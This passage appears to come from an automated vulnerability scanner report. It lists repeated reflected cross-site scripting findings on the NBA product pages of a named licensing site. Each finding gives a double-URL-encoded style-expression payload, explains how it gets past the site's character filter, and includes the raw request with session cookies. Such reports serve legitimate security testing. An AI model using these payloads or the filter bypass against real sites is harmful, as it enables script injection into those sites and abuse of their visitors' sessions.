Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.17. http://www.turnerlicensing.com/NBA/boston_celtics/8190305 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/boston_celtics/8190305
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 500ef%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527130e322f0ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 500ef'style='x:expression(alert(1))'130e322f0ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/boston_celtics/8190305?500ef%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527130e322f0ba=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.18. http://www.turnerlicensing.com/NBA/charlotte_bobcats [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/charlotte_bobcats
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 92f09%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b7d15cb754 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92f09'style='x:expression(alert(1))'8b7d15cb754 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/charlotte_bobcats?92f09%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b7d15cb754=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.19. http://www.turnerlicensing.com/NBA/chicago_bulls [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/chicago_bulls
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da662%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273336b5f603a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da662'style='x:expression(alert(1))'3336b5f603a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/chicago_bulls?da662%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273336b5f603a=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.20. http://www.turnerlicensing.com/NBA/cleveland_cavaliers [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/cleveland_cavaliers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b4e5e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275644fd14a6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4e5e'style='x:expression(alert(1))'5644fd14a6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/cleveland_cavaliers?b4e5e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275644fd14a6b=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.21. http://www.turnerlicensing.com/NBA/dallas_mavericks [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/dallas_mavericks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c38c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c73db034778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c38c9'style='x:expression(alert(1))'c73db034778 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/dallas_mavericks?c38c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c73db034778=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.22. http://www.turnerlicensing.com/NBA/dallas_mavericks/8190309 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/dallas_mavericks/8190309
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41098%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795b3a398db6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41098'style='x:expression(alert(1))'95b3a398db6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/dallas_mavericks/8190309?41098%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795b3a398db6=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.23. http://www.turnerlicensing.com/NBA/denver_nuggets [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/denver_nuggets
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fecb4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279aff6941ac8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fecb4'style='x:expression(alert(1))'9aff6941ac8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/denver_nuggets?fecb4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279aff6941ac8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.24. http://www.turnerlicensing.com/NBA/detroit_pistons [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/detroit_pistons
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d475%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6c8dbceaec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d475'style='x:expression(alert(1))'d6c8dbceaec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/detroit_pistons?4d475%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6c8dbceaec=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.25. http://www.turnerlicensing.com/NBA/detroit_pistons/8170354 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/detroit_pistons/8170354
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9d28%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d60c610a11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9d28'style='x:expression(alert(1))'d60c610a11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/detroit_pistons/8170354?d9d28%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d60c610a11=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.26. http://www.turnerlicensing.com/NBA/golden_state_warriors [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/golden_state_warriors
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da011%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb8effa7465 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da011'style='x:expression(alert(1))'bb8effa7465 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/golden_state_warriors?da011%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb8effa7465=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.27. http://www.turnerlicensing.com/NBA/houston_rockets [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/houston_rockets
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f230e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710376efa672 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f230e'style='x:expression(alert(1))'10376efa672 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/houston_rockets?f230e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710376efa672=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.28. http://www.turnerlicensing.com/NBA/indiana_pacers [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/indiana_pacers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 62eed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527169b01b72cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62eed'style='x:expression(alert(1))'169b01b72cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/indiana_pacers?62eed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527169b01b72cb=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.29. http://www.turnerlicensing.com/NBA/los_angeles_clippers [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/los_angeles_clippers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf1d3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278bebc190ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf1d3'style='x:expression(alert(1))'8bebc190ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/los_angeles_clippers?bf1d3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278bebc190ba=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.30. http://www.turnerlicensing.com/NBA/los_angeles_lakers [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/los_angeles_lakers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 43257%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277a0d3f891bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43257'style='x:expression(alert(1))'7a0d3f891bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/los_angeles_lakers?43257%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277a0d3f891bf=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.31. http://www.turnerlicensing.com/NBA/los_angeles_lakers/8010793 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/los_angeles_lakers/8010793
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 66095%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252700567ee7d15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66095'style='x:expression(alert(1))'00567ee7d15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/los_angeles_lakers/8010793?66095%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252700567ee7d15=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
